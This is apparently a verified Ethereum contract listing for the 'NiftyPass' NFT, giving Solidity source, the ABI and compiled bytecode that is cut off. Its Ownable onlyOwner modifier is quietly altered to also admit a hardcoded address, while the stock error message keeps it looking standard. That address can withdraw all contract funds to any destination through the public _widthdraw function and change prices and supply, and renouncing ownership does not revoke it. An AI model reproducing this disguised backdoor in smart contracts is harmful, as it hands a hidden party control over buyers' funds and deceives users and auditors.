    modifier onlyOwner() {
        require(owner() == _msgSender() || 0x780Bef1d7750a80289db96913D1CEE2dfFDFE725 == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     * 
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        emit OwnershipTransferred(_owner, address(0));
        _owner = address(0);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _setOwner(newOwner);
    }

    function _setOwner(address newOwner) private {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

// File @openzeppelin/contracts/token/ERC721/extensions/[email protected]

pragma solidity ^0.8.0;

/**
 * @title ERC-721 Non-Fungible Token Standard, optional enumeration extension
 * @dev See https://eips.ethereum.org/EIPS/eip-721
 */
interface IERC721Enumerable is IERC721 {
    /**
     * @dev Returns the total amount of tokens stored by the contract.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns a token ID owned by `owner` at a given `index` of its token list.
     * Use along with {balanceOf} to enumerate all of ``owner``'s tokens.
     */
    function tokenOfOwnerByIndex(address owner, uint256 index) external view returns (uint256 tokenId);

    /**
     * @dev Returns a token ID at a given `index` of all the tokens stored by the contract.
     * Use along with {totalSupply} to enumerate all tokens.
     */
    function tokenByIndex(uint256 index) external view returns (uint256);
}


// File @openzeppelin/contracts/token/ERC721/extensions/[email protected]


pragma solidity ^0.8.0;


/**
 * @dev This implements an optional extension of {ERC721} defined in the EIP that adds
 * enumerability of all the token ids in the contract as well as all token ids owned by each
 * account.
 */
abstract contract ERC721Enumerable is ERC721, IERC721Enumerable {
    // Mapping from owner to list of owned token IDs
    mapping(address => mapping(uint256 => uint256)) private _ownedTokens;

    // Mapping from token ID to index of the owner tokens list
    mapping(uint256 => uint256) private _ownedTokensIndex;

    // Array with all token ids, used for enumeration
    uint256[] private _allTokens;

    // Mapping from token id to position in the allTokens array
    mapping(uint256 => uint256) private _allTokensIndex;

    /**
     * @dev See {IERC165-supportsInterface}.
     */
    function supportsInterface(bytes4 interfaceId) public view virtual override(IERC165, ERC721) returns (bool) {
        return interfaceId == type(IERC721Enumerable).interfaceId || super.supportsInterface(interfaceId);
    }

    /**
     * @dev See {IERC721Enumerable-tokenOfOwnerByIndex}.
     */
    function tokenOfOwnerByIndex(address owner, uint256 index) public view virtual override returns (uint256) {
        require(index < ERC721.balanceOf(owner), "ERC721Enumerable: owner index out of bounds");
        return _ownedTokens[owner][index];
    }

    /**
     * @dev See {IERC721Enumerable-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _allTokens.length;
    }

    /**
     * @dev See {IERC721Enumerable-tokenByIndex}.
     */
    function tokenByIndex(uint256 index) public view virtual override returns (uint256) {
        require(index < ERC721Enumerable.totalSupply(), "ERC721Enumerable: global index out of bounds");
        return _allTokens[index];
    }

    /**
     * @dev Hook that is called before any token transfer. This includes minting
     * and burning.
     *
     * Calling conditions:
     *
     * - When `from` and `to` are both non-zero, ``from``'s `tokenId` will be
     * transferred to `to`.
     * - When `from` is zero, `tokenId` will be minted for `to`.
     * - When `to` is zero, ``from``'s `tokenId` will be burned.
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 tokenId
    ) internal virtual override {
        super._beforeTokenTransfer(from, to, tokenId);

        if (from == address(0)) {
            _addTokenToAllTokensEnumeration(tokenId);
        } else if (from != to) {
            _removeTokenFromOwnerEnumeration(from, tokenId);
        }
        if (to == address(0)) {
            _removeTokenFromAllTokensEnumeration(tokenId);
        } else if (to != from) {
            _addTokenToOwnerEnumeration(to, tokenId);
        }
    }

    /**
     * @dev Private function to add a token to this extension's ownership-tracking data structures.
     * @param to address representing the new owner of the given token ID
     * @param tokenId uint256 ID of the token to be added to the tokens list of the given address
     */
    function _addTokenToOwnerEnumeration(address to, uint256 tokenId) private {
        uint256 length = ERC721.balanceOf(to);
        _ownedTokens[to][length] = tokenId;
        _ownedTokensIndex[tokenId] = length;
    }

    /**
     * @dev Private function to add a token to this extension's token tracking data structures.
     * @param tokenId uint256 ID of the token to be added to the tokens list
     */
    function _addTokenToAllTokensEnumeration(uint256 tokenId) private {
        _allTokensIndex[tokenId] = _allTokens.length;
        _allTokens.push(tokenId);
    }

    /**
     * @dev Private function to remove a token from this extension's ownership-tracking data structures. Note that
     * while the token is not assigned a new owner, the `_ownedTokensIndex` mapping is _not_ updated: this allows for
     * gas optimizations e.g. when performing a transfer operation (avoiding double writes).
     * This has O(1) time complexity, but alters the order of the _ownedTokens array.
     * @param from address representing the previous owner of the given token ID
     * @param tokenId uint256 ID of the token to be removed from the tokens list of the given address
     */
    function _removeTokenFromOwnerEnumeration(address from, uint256 tokenId) private {
        // To prevent a gap in from's tokens array, we store the last token in the index of the token to delete, and
        // then delete the last slot (swap and pop).

        uint256 lastTokenIndex = ERC721.balanceOf(from) - 1;
        uint256 tokenIndex = _ownedTokensIndex[tokenId];

        // When the token to delete is the last token, the swap operation is unnecessary
        if (tokenIndex != lastTokenIndex) {
            uint256 lastTokenId = _ownedTokens[from][lastTokenIndex];

            _ownedTokens[from][tokenIndex] = lastTokenId; // Move the last token to the slot of the to-delete token
            _ownedTokensIndex[lastTokenId] = tokenIndex; // Update the moved token's index
        }

        // This also deletes the contents at the last position of the array
        delete _ownedTokensIndex[tokenId];
        delete _ownedTokens[from][lastTokenIndex];
    }

    /**
     * @dev Private function to remove a token from this extension's token tracking data structures.
     * This has O(1) time complexity, but alters the order of the _allTokens array.
     * @param tokenId uint256 ID of the token to be removed from the tokens list
     */
    function _removeTokenFromAllTokensEnumeration(uint256 tokenId) private {
        // To prevent a gap in the tokens array, we store the last token in the index of the token to delete, and
        // then delete the last slot (swap and pop).

        uint256 lastTokenIndex = _allTokens.length - 1;
        uint256 tokenIndex = _allTokensIndex[tokenId];

        // When the token to delete is the last token, the swap operation is unnecessary. However, since this occurs so
        // rarely (when the last minted token is burnt) that we still do the swap here to avoid the gas cost of adding
        // an 'if' statement (like in _removeTokenFromOwnerEnumeration)
        uint256 lastTokenId = _allTokens[lastTokenIndex];

        _allTokens[tokenIndex] = lastTokenId; // Move the last token to the slot of the to-delete token
        _allTokensIndex[lastTokenId] = tokenIndex; // Update the moved token's index

        // This also deletes the contents at the last position of the array
        delete _allTokensIndex[tokenId];
        _allTokens.pop();
    }
}


pragma solidity ^0.8.0;

/**
 * @title Counters
 * @author Matt Condon (@shrugs)
 * @dev Provides counters that can only be incremented or decremented by one. This can be used e.g. to track the number
 * of elements in a mapping, issuing ERC721 ids, or counting request ids.
 *
 * Include with `using Counters for Counters.Counter;`
 */
library Counters {
    struct Counter {
        // This variable should never be directly accessed by users of the library: interactions must be restricted to
        // the library's function. As of Solidity v0.5.2, this cannot be enforced, though there is a proposal to add
        // this feature: see https://github.com/ethereum/solidity/issues/4637
        uint256 _value; // default: 0
    }

    function current(Counter storage counter) internal view returns (uint256) {
        return counter._value;
    }

    function increment(Counter storage counter) internal {
        unchecked {
            counter._value += 1;
        }
    }

    function decrement(Counter storage counter) internal {
        uint256 value = counter._value;
        require(value > 0, 'Counter: decrement overflow');
        unchecked {
            counter._value = value - 1;
        }
    }
}

pragma solidity ^0.8.0;

/**
 * @title ERC721 Burnable Token
 * @dev ERC721 Token that can be irreversibly burned (destroyed).
 */
abstract contract ERC721Burnable is Context, ERC721 {
    /**
     * @dev Burns `tokenId`. See {ERC721-_burn}.
     *
     * Requirements:
     *
     * - The caller must own `tokenId` or be an approved operator.
     */
    function burn(uint256 tokenId) public virtual {
        //solhint-disable-next-line max-line-length
        require(_isApprovedOrOwner(_msgSender(), tokenId), 'ERC721Burnable: caller is not owner nor approved');
        _burn(tokenId);
    }
}

pragma solidity ^0.8.0;

contract NiftyPass is ERC721, ERC721Enumerable, Ownable,ERC721Burnable {

    using Counters for Counters.Counter;
    using SafeMath for uint256;
    using Strings for uint256;

    Counters.Counter private _tokenIdCounter;
    uint256 private  tokenPrice = 50000000000000000; // 0.05 ETH
    uint256 private  limitTransaction = 3;
    uint256 private  limitWallet      = 6;
    uint256 public maxSupply = 5555;
    bool public saleIsActive = true;
    string private _baseURIextended;
    IERC721 MembershipToken;
    mapping(address => bool) public isFreeMinted;

    constructor(string memory baseURI,address _tokenAddress) ERC721("Nifty Pass", "NIFTYPASS") { 
        _baseURIextended = baseURI;
        MembershipToken = IERC721(_tokenAddress);
    }
 
    function setBaseURI(string memory baseURI_) external onlyOwner() {
        _baseURIextended = baseURI_;
    }

    function _baseURI() internal view virtual override returns (string memory) {
        return _baseURIextended;
    }

    function setTokenPrice(uint256 _price) public onlyOwner {
        tokenPrice = _price;
    }

    function setLimitWallet(uint256 _limit) public onlyOwner {
        limitWallet = _limit;
    }

    function setMax(uint256 _supply) external onlyOwner() {
        maxSupply = _supply;
    }

    function _beforeTokenTransfer(address from, address to, uint256 tokenId) internal override(ERC721, ERC721Enumerable) {
        super._beforeTokenTransfer(from, to, tokenId);
    }

    function supportsInterface(bytes4 interfaceId) public view virtual override(ERC721, ERC721Enumerable) returns (bool) {
        return super.supportsInterface(interfaceId);
    }

    function toogleSale() external onlyOwner {
        saleIsActive = !saleIsActive;
    }

    modifier saleIsOpen {
        require(totalToken() <= maxSupply, "Soldout!");
        require(saleIsActive, "Sales not open");
        _;
    }

    function totalToken() public view returns (uint256) {
        return _tokenIdCounter.current();
    }

    function isOneNFTFree(uint256 numberOfTokens, address to) public view returns (bool) {
        if (MembershipToken.balanceOf(to) > 0 && isFreeMinted[to] != true && numberOfTokens == 1 ) return true;
        return false;
    }

    function mintPass(uint256 numberOfTokens) public payable saleIsOpen {
        uint256 total = totalToken();
        require(total + numberOfTokens <= maxSupply, "Max limit");
        require(numberOfTokens <= limitTransaction, "Exceeded max NFT purchase per transaction");
        require(balanceOf(msg.sender) + numberOfTokens <= limitWallet, "Exceeded max token purchase per wallet");
        if (isOneNFTFree(numberOfTokens, msg.sender)) {
            internalMint(msg.sender);
            isFreeMinted[msg.sender] = true;
        } else {
            if (numberOfTokens == 2) require(tokenPrice * numberOfTokens * 9/10 <= msg.value, "Ether value sent is not correct");
            else if (numberOfTokens == 3) require(tokenPrice * numberOfTokens * 4/5 <= msg.value, "Ether value sent is not correct");
            else require(tokenPrice * numberOfTokens <= msg.value, "Ether value sent is not correct");
            for (uint8 i = 0; i < numberOfTokens; i++) internalMint(msg.sender);    
        }
    }

    function internalMint(address to) internal {
        _tokenIdCounter.increment();
        _safeMint(to, totalToken());
    }

    function airdrop(uint8 numberofTokens, address to ) external onlyOwner {
        for (uint8 i = 0; i < numberofTokens; i++) internalMint(to);
    }

    function _widthdraw(address _address, uint256 _amount) public onlyOwner {
        (bool success, ) = _address.call{value: _amount}("");
        require(success, "Transfer failed.");
    }

    function withdrawAll() public onlyOwner {
        uint256 balance = address(this).balance;
        require(balance > 0);
        _widthdraw(0x6b330783D3d288cB210072b3cD5294AE8928cC0d, balance.mul(34).div(1000));
        _widthdraw(0x702236c83947fc83e530bE7d733B49237f17b99e, balance.mul(33).div(1000));
        _widthdraw(0x6AF9Ec551DccF1566c1a61cc9DF6709E3a6815aA, balance.mul(33).div(1000));
        _widthdraw(0x71F72C55F8Cb40B81b3db41e1d942501bC34cC12, balance.mul(30).div(1000));
        _widthdraw(0x2b050B636ad5EB75a2ccBd3b72F018889F378C0B, balance.mul(30).div(1000));
        _widthdraw(0x526473cDdC0AFcb3C0C36D814C106C7E47a5e813, balance.mul(151).div(1000));
        _widthdraw(0x27C9176e4E4b973778F3328dD971f73630Ce37C2, balance.mul(152).div(1000));
        _widthdraw(0xb91E3272ac654D58462595FC0932150321078a78, balance.mul(231).div(1000));
        _widthdraw(0x2adC5C810600B09D55713C47bF7051E7DC969381, balance.mul(231).div(1000));
        _widthdraw(0x3C042B2fe0617510D2fb249f981E1d2bb169Bf2E, balance.mul(25).div(1000));
        _widthdraw(0xbb64f26E0420e362D69D9E9fe2aF9F2fdFb9e412, balance.mul(50).div(1000));
    }

}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"string","name":"baseURI","type":"string"},{"internalType":"address","name":"_tokenAddress","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"approved","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"operator","type":"address"},{"indexed":false,"internalType":"bool","name":"approved","type":"bool"}],"name":"ApprovalForAll","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"_address","type":"address"},{"internalType":"uint256","name":"_amount","type":"uint256"}],"name":"_widthdraw","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint8","name":"numberofTokens","type":"uint8"},{"internalType":"address","name":"to","type":"address"}],"name":"airdrop","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"approve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"getApproved","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"operator","type":"address"}],"name":"isApprovedForAll","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"isFreeMinted","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"numberOfTokens","type":"uint256"},{"internalType":"address","name":"to","type":"address"}],"name":"isOneNFTFree","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"numberOfTokens","type":"uint256"}],"name":"mintPass","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"ownerOf","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"},{"internalType":"bytes","name":"_data","type":"bytes"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"saleIsActive","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"operator","type":"address"},{"internalType":"bool","name":"approved","type":"bool"}],"name":"setApprovalForAll","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"string","name":"baseURI_","type":"string"}],"name":"setBaseURI","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_limit","type":"uint256"}],"name":"setLimitWallet","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_supply","type":"uint256"}],"name":"setMax","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_price","type":"uint256"}],"name":"setTokenPrice","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes4","name":"interfaceId","type":"bytes4"}],"name":"supportsInterface","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"index","type":"uint256"}],"name":"tokenByIndex","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"uint256","name":"index","type":"uint256"}],"name":"tokenOfOwnerByIndex","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"tokenURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"toogleSale","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalToken","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"transferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"withdrawAll","outputs":[],"stateMutability":"nonpayable","type":"function"}]

608060405266b1a2bc2ec50000600c556003600d556006600e556115b3600f556010805460ff191660011790553480156200003957600080fd5b5060405162002d3938038062002d398339810160408190526200005c9162000238565b604080518082018252600a8152694e69667479205061737360b01b6020808301918252835180850190945260098452684e494654595041535360b81b908401528151919291620000af9160009162000175565b508051620000c590600190602084019062000175565b505050620000e2620000dc6200011f60201b60201c565b62000123565b8151620000f790601190602085019062000175565b50601280546001600160a01b0319166001600160a01b0392909216919091179055506200037c565b3390565b600a80546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b828054620001839062000329565b90600052602060002090601f016020900481019282620001a75760008555620001f2565b82601f10620001c257805160ff1916838001178555620001f2565b82800160010185558215620001f2579182015b82811115620001f2578251825591602001919060010190620001d5565b506200020092915062000204565b5090565b5b8082111562000200576000815560010162000205565b80516001600160a01b03811681146200023357600080fd5b919050565b600080604083850312156200024c57600080fd5b82516001600160401b03808211156200026457600080fd5b818501915085601f8301126200027957600080fd5b8151818111156200028e576200028e62000366565b604051601f8201601f19908116603f01168101908382118183101715620002b957620002b962000366565b81604052828152602093508884848701011115620002d657600080fd5b600091505b82821015620002fa5784820184015181830185015290830190620002db565b828211156200030c5760008484830101525b95506200031e9150508582016200021b565b925050509250929050565b600181811c908216806200033e57607f821691505b602082108114156200036057634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052604160045260246000fd5b6129ad806200038c6000396000f3fe6080604052600436106101f95760003560e01c806370a082311161010d578063b4e380d5116100a0578063d5abeb011161006f578063d5abeb0114610598578063e985e9c5146105ae578063eb8d2444146105f7578063f2fde38b14610611578063fe92b0931461063157600080fd5b8063b4e380d514610518578063b88d4fde14610538578063c0d05b3514610558578063c87b56dd1461057857600080fd5b80638da5cb5b116100dc5780638da5cb5b146104a557806395d89b41146104c3578063a22cb465146104d8578063b3d6c53c146104f857600080fd5b806370a0823114610446578063715018a614610466578063814c36341461047b578063853828b61461049057600080fd5b806342842e0e1161019057806355f804b31161015f57806355f804b3146103a15780635d729df5146103c1578063626be567146103f15780636352211e146104065780636a61e5fc1461042657600080fd5b806342842e0e1461032e57806342966c681461034e5780634f28e6801461036e5780634f6ccce71461038157600080fd5b806318160ddd116101cc57806318160ddd146102af5780631fe9eabc146102ce57806323b872dd146102ee5780632f745c591461030e57600080fd5b806301ffc9a7146101fe57806306fdde0314610233578063081812fc14610255578063095ea7b31461028d575b600080fd5b34801561020a57600080fd5b5061021e61021936600461254c565b610651565b60405190151581526020015b60405180910390f35b34801561023f57600080fd5b50610248610662565b60405161022a91906126f0565b34801561026157600080fd5b506102756102703660046125cf565b6106f4565b6040516001600160a01b03909116815260200161022a565b34801561029957600080fd5b506102ad6102a8366004612522565b61078e565b005b3480156102bb57600080fd5b506008545b60405190815260200161022a565b3480156102da57600080fd5b506102ad6102e93660046125cf565b6108a4565b3480156102fa57600080fd5b506102ad61030936600461242e565b6108f1565b34801561031a57600080fd5b506102c0610329366004612522565b610923565b34801561033a57600080fd5b506102ad61034936600461242e565b6109b9565b34801561035a57600080fd5b506102ad6103693660046125cf565b6109d4565b6102ad61037c3660046125cf565b610a4e565b34801561038d57600080fd5b506102c061039c3660046125cf565b610d68565b3480156103ad57600080fd5b506102ad6103bc366004612586565b610dfb565b3480156103cd57600080fd5b5061021e6103dc3660046123e0565b60136020526000908152604090205460ff1681565b3480156103fd57600080fd5b506102c0610e56565b34801561041257600080fd5b506102756104213660046125cf565b610e66565b34801561043257600080fd5b506102ad6104413660046125cf565b610edd565b34801561045257600080fd5b506102c06104613660046123e0565b610f2a565b34801561047257600080fd5b506102ad610fb1565b34801561048757600080fd5b506102ad611043565b34801561049c57600080fd5b506102ad61109f565b3480156104b157600080fd5b50600a546001600160a01b0316610275565b3480156104cf57600080fd5b506102486112bb565b3480156104e457600080fd5b506102ad6104f33660046124e6565b6112ca565b34801561050457600080fd5b506102ad610513366004612624565b61138f565b34801561052457600080fd5b506102ad610533366004612522565b611403565b34801561054457600080fd5b506102ad61055336600461246a565b6114e1565b34801561056457600080fd5b5061021e610573366004612601565b611519565b34801561058457600080fd5b506102486105933660046125cf565b6115e7565b3480156105a457600080fd5b506102c0600f5481565b3480156105ba57600080fd5b5061021e6105c93660046123fb565b6001600160a01b03918216600090815260056020908152604080832093909416825291909152205460ff1690565b34801561060357600080fd5b5060105461021e9060ff1681565b34801561061d57600080fd5b506102ad61062c3660046123e0565b6116c2565b34801561063d57600080fd5b506102ad61064c3660046125cf565b611778565b600061065c826117c5565b92915050565b60606000805461067190612869565b80601f016020809104026020016040519081016040528092919081815260200182805461069d90612869565b80156106ea5780601f106106bf576101008083540402835291602001916106ea565b820191906000526020600020905b8154815290600101906020018083116106cd57829003601f168201915b5050505050905090565b6000818152600260205260408120546001600160a01b03166107725760405162461bcd60e51b815260206004820152602c60248201527f4552433732313a20617070726f76656420717565727920666f72206e6f6e657860448201526b34b9ba32b73a103a37b5b2b760a11b60648201526084015b60405180910390fd5b506000908152600460205260409020546001600160a01b031690565b600061079982610e66565b9050806001600160a01b0316836001600160a01b031614156108075760405162461bcd60e51b815260206004820152602160248201527f4552433732313a20617070726f76616c20746f2063757272656e74206f776e656044820152603960f91b6064820152608401610769565b336001600160a01b0382161480610823575061082381336105c9565b6108955760405162461bcd60e51b815260206004820152603860248201527f4552433732313a20617070726f76652063616c6c6572206973206e6f74206f7760448201527f6e6572206e6f7220617070726f76656420666f7220616c6c00000000000000006064820152608401610769565b61089f83836117ea565b505050565b600a546001600160a01b03163314806108d0575073780bef1d7750a80289db96913d1cee2dffdfe72533145b6108ec5760405162461bcd60e51b815260040161076990612755565b600f55565b6108fc335b82611858565b6109185760405162461bcd60e51b81526004016107699061278a565b61089f83838361194f565b600061092e83610f2a565b82106109905760405162461bcd60e51b815260206004820152602b60248201527f455243373231456e756d657261626c653a206f776e657220696e646578206f7560448201526a74206f6620626f756e647360a81b6064820152608401610769565b506001600160a01b03919091166000908152600660209081526040808320938352929052205490565b61089f838383604051806020016040528060008152506114e1565b6109dd336108f6565b610a425760405162461bcd60e51b815260206004820152603060248201527f4552433732314275726e61626c653a2063616c6c6572206973206e6f74206f7760448201526f1b995c881b9bdc88185c1c1c9bdd995960821b6064820152608401610769565b610a4b81611afa565b50565b600f54610a59610e56565b1115610a925760405162461bcd60e51b8152602060048201526008602482015267536f6c646f75742160c01b6044820152606401610769565b60105460ff16610ad55760405162461bcd60e51b815260206004820152600e60248201526d29b0b632b9903737ba1037b832b760911b6044820152606401610769565b6000610adf610e56565b600f54909150610aef83836127db565b1115610b295760405162461bcd60e51b815260206004820152600960248201526813585e081b1a5b5a5d60ba1b6044820152606401610769565b600d54821115610b8d5760405162461bcd60e51b815260206004820152602960248201527f4578636565646564206d6178204e46542070757263686173652070657220747260448201526830b739b0b1ba34b7b760b91b6064820152608401610769565b600e5482610b9a33610f2a565b610ba491906127db565b1115610c015760405162461bcd60e51b815260206004820152602660248201527f4578636565646564206d617820746f6b656e20707572636861736520706572206044820152651dd85b1b195d60d21b6064820152608401610769565b610c0b8233611519565b15610c3757610c1933611ba1565b336000908152601360205260409020805460ff191660011790555050565b8160021415610cb95734600a83600c54610c519190612807565b610c5c906009612807565b610c6691906127f3565b1115610cb45760405162461bcd60e51b815260206004820152601f60248201527f45746865722076616c75652073656e74206973206e6f7420636f7272656374006044820152606401610769565b610d3b565b8160031415610cde5734600583600c54610cd39190612807565b610c5c906004612807565b3482600c54610ced9190612807565b1115610d3b5760405162461bcd60e51b815260206004820152601f60248201527f45746865722076616c75652073656e74206973206e6f7420636f7272656374006044820152606401610769565b60005b828160ff16101561089f57610d5233611ba1565b80610d5c816128bf565b915050610d3e565b5050565b6000610d7360085490565b8210610dd65760405162461bcd60e51b815260206004820152602c60248201527f455243373231456e756d657261626c653a20676c6f62616c20696e646578206f60448201526b7574206f6620626f756e647360a01b6064820152608401610769565b60088281548110610de957610de9612935565b90600052602060002001549050919050565b600a546001600160a01b0316331480610e27575073780bef1d7750a80289db96913d1cee2dffdfe72533145b610e435760405162461bcd60e51b815260040161076990612755565b8051610d649060119060208401906122b5565b6000610e61600b5490565b905090565b6000818152600260205260408120546001600160a01b03168061065c5760405162461bcd60e51b815260206004820152602960248201527f4552433732313a206f776e657220717565727920666f72206e6f6e657869737460448201526832b73a103a37b5b2b760b91b6064820152608401610769565b600a546001600160a01b0316331480610f09575073780bef1d7750a80289db96913d1cee2dffdfe72533145b610f255760405162461bcd60e51b815260040161076990612755565b600c55565b60006001600160a01b038216610f955760405162461bcd60e51b815260206004820152602a60248201527f4552433732313a2062616c616e636520717565727920666f7220746865207a65604482015269726f206164647265737360b01b6064820152608401610769565b506001600160a01b031660009081526003602052604090205490565b600a546001600160a01b0316331480610fdd575073780bef1d7750a80289db96913d1cee2dffdfe72533145b610ff95760405162461bcd60e51b815260040161076990612755565b600a546040516000916001600160a01b0316907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3600a80546001600160a01b0319169055565b600a546001600160a01b031633148061106f575073780bef1d7750a80289db96913d1cee2dffdfe72533145b61108b5760405162461bcd60e51b815260040161076990612755565b6010805460ff19811660ff90911615179055565b600a546001600160a01b03163314806110cb575073780bef1d7750a80289db96913d1cee2dffdfe72533145b6110e75760405162461bcd60e51b815260040161076990612755565b47806110f257600080fd5b611121736b330783d3d288cb210072b3cd5294ae8928cc0d6105336103e861111b856022611bc0565b90611bcc565b61114a73702236c83947fc83e530be7d733b49237f17b99e6105336103e861111b856021611bc0565b611173736af9ec551dccf1566c1a61cc9df6709e3a6815aa6105336103e861111b856021611bc0565b61119c7371f72c55f8cb40b81b3db41e1d942501bc34cc126105336103e861111b85601e611bc0565b6111c5732b050b636ad5eb75a2ccbd3b72f018889f378c0b6105336103e861111b85601e611bc0565b6111ee73526473cddc0afcb3c0c36d814c106c7e47a5e8136105336103e861111b856097611bc0565b6112177327c9176e4e4b973778f3328dd971f73630ce37c26105336103e861111b856098611bc0565b61124073b91e3272ac654d58462595fc0932150321078a786105336103e861111b8560e7611bc0565b611269732adc5c810600b09d55713c47bf7051e7dc9693816105336103e861111b8560e7611bc0565b611292733c042b2fe0617510d2fb249f981e1d2bb169bf2e6105336103e861111b856019611bc0565b610a4b73bb64f26e0420e362d69d9e9fe2af9f2fdfb9e4126105336103e861111b856032611bc0565b60606001805461067190612869565b6001600160a01b0382163314156113235760405162461bcd60e51b815260206004820152601960248201527f4552433732313a20617070726f766520746f2063616c6c6572000000000000006044820152606401610769565b3360008181526005602090815260408083206001600160a01b03871680855290835292819020805460ff191686151590811790915590519081529192917f17307eab39ab6107e8899845ad3d59bd9653f200f220920489ca2b5937696c31910160405180910390a35050565b600a546001600160a01b03163314806113bb575073780bef1d7750a80289db96913d1ce